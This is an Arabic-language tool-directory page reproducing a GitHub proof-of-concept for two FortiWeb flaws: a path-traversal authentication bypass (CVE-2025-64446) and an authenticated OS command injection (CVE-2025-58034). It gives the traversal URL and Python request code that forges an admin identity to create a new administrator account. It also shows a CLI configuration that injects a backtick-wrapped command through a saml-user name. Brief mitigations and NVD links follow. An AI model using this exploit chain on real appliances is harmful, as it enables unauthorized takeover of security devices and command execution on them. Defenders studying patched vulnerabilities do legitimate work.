Skip to content
KitploitKITPLOIT
أدواتالمدونة
Log in
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

الخلاصاتاتصالالخصوصية© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/litndat/vulnerability-cve-2025-64446-cve-2025-58034
المصادقة والترخيصتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبالتعلم والتعليممختبرات وتدريب عملي
GitHublitndat/vulnerability-cve-2025-64446-cve-2025-58034

Vulnerability-CVE-2025-64446-CVE-2025-58034

استغلال PoC لـ FortiWeb CVE-2025-64446 (تجاوز المصادقة عبر اجتياز المسار) وCVE-2025-58034 (حقن أوامر نظام التشغيل) مع تحليل مفصل وإرشادات التخفيف.

عرض المستودع
13منذ 3 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

محاكاة استغلال FortiWeb (CVE-2025-64446 & CVE-2025-58034)

ملاحظة:

  • هذه الوثيقة مخصصة لأغراض التعلم والبحث الأمني فقط.
  • لا تستخدمها لمهاجمة الأنظمة دون الحصول على إذن مسبق.

1. نظرة عامة

FortiWeb هو جهاز جدار حماية تطبيقات الويب (WAF) يُستخدم لحماية تطبيقات الويب.

في عام 2025، تم اكتشاف ثغرتين خطيرتين:

  • CVE-2025-64446 – تجاوز المصادقة عبر Path Traversal
  • CVE-2025-58034 – OS Command Injection

2. نظرة عامة على CVE-2025-64446

الحقلالمحتوى
نوع الثغرةRelative Path Traversal
Authentication Bypass
السببيعالج FortiWeb المسارات بشكل غير صارم قبل المصادقة:

- التحكم في الوصول يعتمد على سلسلة المسار المنطقي
- عدم تطبيع المسار بشكل كامل
- السماح باستخدام ../ للوصول إلى الموارد الداخلية
الوصفيمكن الوصول إلى بعض نقاط نهاية الإدارة (endpoints) دون مصادقة صالحة
الأثر- تجاوز المصادقة بالكامل
- وصول غير مصرح به إلى وظائف الإدارة
- كسر نموذج الصلاحيات
الإصدارات المتأثرة- 8.0.0 – 8.0.1
- 7.6.0 – 7.6.4
- 7.4.0 – 7.4.9
- 7.2.0 – 7.2.11
- 7.0.0 – 7.0.11

مثال:

/api/v2.0/cmdb/system/../../../../../../cgi-bin/fwbcgi

3. نظرة عامة على CVE-2025-58034

الحقلالمحتوى
نوع الثغرةOS Command Injection (CWE-78)
السببيعالج FortiWeb الإدخال (input) بشكل غير آمن عند تنفيذ أوامر نظام التشغيل:

- عدم التحقق من صحة الإدخال
- عدم escape الأحرف الخاصة
- تمرير بيانات المستخدم مباشرة إلى أوامر النظام
الوصفتتطلب الثغرة مصادقة ولكنها تسمح بحقن أوامر النظام
الأثر- تنفيذ أوامر غير مقصودة
- الوصول إلى موارد النظام
- التأثير على السلامة والتوافر
الإصدارات المتأثرة- 8.0.0 – 8.0.1
- 7.6.0 – 7.6.5
- 7.4.0 – 7.4.10
- 7.2.0 – 7.2.11
- 7.0.0 – 7.0.11

4. العملية التجريبية (POC)

4.1. تجهيز البيئة:

python3 -m venv venv
source venv/bin/activate
pip install -r requirements.txt

يساعد ذلك في تجنب تعارض إصدارات المكتبات، ويضمن استقرار بيئة العمل، ويحد من التأثير على النظام

image

4.2 الاستغلال

الحمولة

 cgiinfo_json = {
        "username": "admin",
        "profname": "prof_admin",
        "vdom": "root",
        "loginname": "admin"
    }
cgiinfo_b64 = base64.b64encode(json.dumps(cgiinfo_json).encode()).decode()
conn.request("POST", "/api/v2.0/cmdb/system/admin%3f/../../../../../cgi-bin/fwbcgi", body=body_data, headers=headers)
        resp = conn.getresponse()
result = {
            'target': f"{host}:{port}",
            'status': resp.status,
            'user': username,
            'password': password,
            'success': resp.status == 200
        }

شغّل الأداة باستخدام Python3:

python3 exploit.py <IP_target>
  • <IP_target>: عنوان IP هنا هو اسم مضيف جهاز FortiWeb.
image

تم الحصول على اسم المستخدم وكلمة المرور -> قم بتسجيل الدخول

image image

تم الاستغلال بنجاح وإنشاء حساب جديد بصلاحيات admin.

4.3 استغلال CVE-2025-58034 بعد تسجيل الدخول إلى الحساب

بعد تسجيل الدخول بنجاح باستخدام حساب الإدارة المُنشأ حديثًا، يمكن للمهاجم استغلال ثغرة حقن الأوامر المُصادَق عليها عبر طلبات مُصنَّعة خصيصًا أو مباشرة عبر واجهة سطر أوامر FortiWeb CLI:

config user saml-user

edit "`id`" ## nhập lệnh tại đây

set entityID http://foo

set service-path /foo

set enforce-signing disable

set slo-bind post

set slo-path /foo

set sso-bind post

set sso-path /foo

end

سيقوم FortiWeb بالخروج من سلسلة الإعدادات وتنفيذ الأمر id أثناء عملية إعداد saml-user.

5. بعض طرق التخفيف من الثغرات

  • تحديث FortiWeb إلى الإصدار المُصحَّح.
  • تقييد الوصول إلى واجهة الإدارة.
  • عدم تعريض واجهة الإدارة للإنترنت.
  • فحص حسابات admin غير المعتادة.

6. مراجع إضافية

  • CVE-2025-64446 – https://nvd.nist.gov/vuln/detail/CVE-2025-64446
  • CVE-2025-58034 – https://nvd.nist.gov/vuln/detail/CVE-2025-58034
تنزيل الأداة